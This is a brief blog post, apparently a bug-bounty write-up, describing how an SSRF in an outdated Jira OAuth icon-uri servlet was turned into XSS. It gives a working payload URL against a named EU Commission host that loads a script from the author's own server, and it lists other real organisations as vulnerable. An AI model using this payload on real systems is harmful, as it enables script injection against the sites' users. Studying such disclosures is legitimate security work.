How I found XSS via SSRF vulnerability -Adesh Kolte

2 min readJun 7, 2018

--

Hello

This is Adesh Nandkishor Kolte

First Read This Articles

How i converted SSRF TO XSS in jira.

I m very much into Bug Bounty and i spend my whole day doing this finding new and interesting stuff and kept on…

medium.com

Piercing the Veil: Server Side Request Forgery to NIPRNet access

During my reconnaissance of military websites as part of the Department of Defense’s vulnerability disclosure, I…

medium.com

After reading both articles I figure out new way to carry out the XSS attack ,discovered that due to an outdated Jira instance, I was able to exploit an SSRF vulnerability in Jira and was able to perform several actions such as bypass any firewall/protection solutions and etc

so i just tried some basics tricks with google for finding the web apps which used jira integration

got web europa

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=

so i quickly visited

“plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com”

And Boom i got the google page and i m like

i had uploaded xss script on my own Server http://adeshkolte.at.ua/h.html

and pasted it at the place of google.com

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http://adeshkolte.at.ua/h.html

then i found many webs vulnerable for it

Motorola Solution

Mass.gov

Cambridge University Press

Stanford University

Thanks for reading

Adesh Kolte

Written by Adesh Kolte

Listed in Top 100 most respected hackers in the world by Microsoft at the BlackHat conference in America 2018

Recommended from Medium

$1,250 worth of Host Header Injection

Salman Khan

$1,250 worth of Host Header Injection

What is Host Header Injection?

4 min read4 days ago

--

7

SSRF & Cross-site Scripting

YCZHU

SSRF & Cross-site Scripting

Task 1 What is an SSRF?

6 min readApr 17

--

Lists

Staff Picks

457 stories305 saves

Stories to Help You Level-Up at Work

19 stories227 saves

Self-Improvement 101

20 stories621 saves

Productivity 101

20 stories577 saves

Tryhackme: OWASP Broken Access Control

Kamalkannanares

Tryhackme: OWASP Broken Access Control

OWASP Broken Access Control — I have just completed this room! Check it out: https://tryhackme.com/room/owaspbrokenaccesscontrol

12 min readJun 30

--

LFI to RCE via Log Poisoning

Josewice7

LFI to RCE via Log Poisoning

Hello, I am W1C3, and today I will explain how to achieve LFI to RCE via Log Poisoning. This challenge was developed for the CyberArena CTF…

3 min readApr 16

--

2

Unveiling Security Vulnerability on a Microsoft Subdomain: Open Redirects to RXSS Exploitation

Sawrav Chowdhury

Unveiling Security Vulnerability on a Microsoft Subdomain: Open Redirects to RXSS Exploitation

In this article, I am going to cover another security bug that I found on a Microsoft subdomain. Initially, when I visited…

1 min readMay 18

--

SSRF Server-Side Request Forgery WH7

cyberakp

SSRF Server-Side Request Forgery WH7

HEllo i hope you are doing well welcome to SSRF WH7 webhacking part 7

4 min readJun 22

--

See more recommendations

Help
Status
Writers
Blog
Careers
Privacy
Terms
About
Text to speech
Teams